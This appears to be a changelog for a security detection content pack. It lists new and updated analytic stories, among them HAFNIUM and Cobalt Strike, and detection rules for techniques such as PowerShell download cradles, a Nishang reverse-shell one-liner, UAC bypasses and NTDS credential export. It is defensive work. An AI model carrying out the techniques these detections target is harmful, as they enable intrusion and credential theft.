New Analytic Stories
- Silver Sparrow
- HAFNIUM Group
New Detections
- Cobalt Strike Named Pipes
- Suspicious DLLHost no Command Line Arguments
- Suspicious GPUpdate no Command Line Arguments
- Suspicious SearchProtocolHost no Command Line Arguments
- Suspicious PlistBuddy Usage
- Suspicious SQLite3 LSAQuarantine Behavior
- Suspicious Curl Network Connection
- Ryuk Wake on LAN Command
- Suspicious Scheduled Task from Public Directory
- Fodhelper UAC Bypass
- Eventvwr UAC Bypass
- Any PowerShell DownloadString
- Any PowerShell DownloadFile
- Unified Messaging Service Spawning a Process
- Suspicious Unified Messaging Service File Writes
- Nishang PowershellTCPOneLine
- W3WP Spawning Shells
Updated Analytic Stories
- Cobalt Strike
- Suspicious MSHTA Activity
Updated Detections
- NTdsutil Export NTDS
- Suspicious MSBuild Path
- Suspicious MSBuild Rename
- Suspicious Microsoft Workflow Compiler Rename
- Detect Regsvr32 Application Control Bypass
- Windows DisableAntiSpyware Registry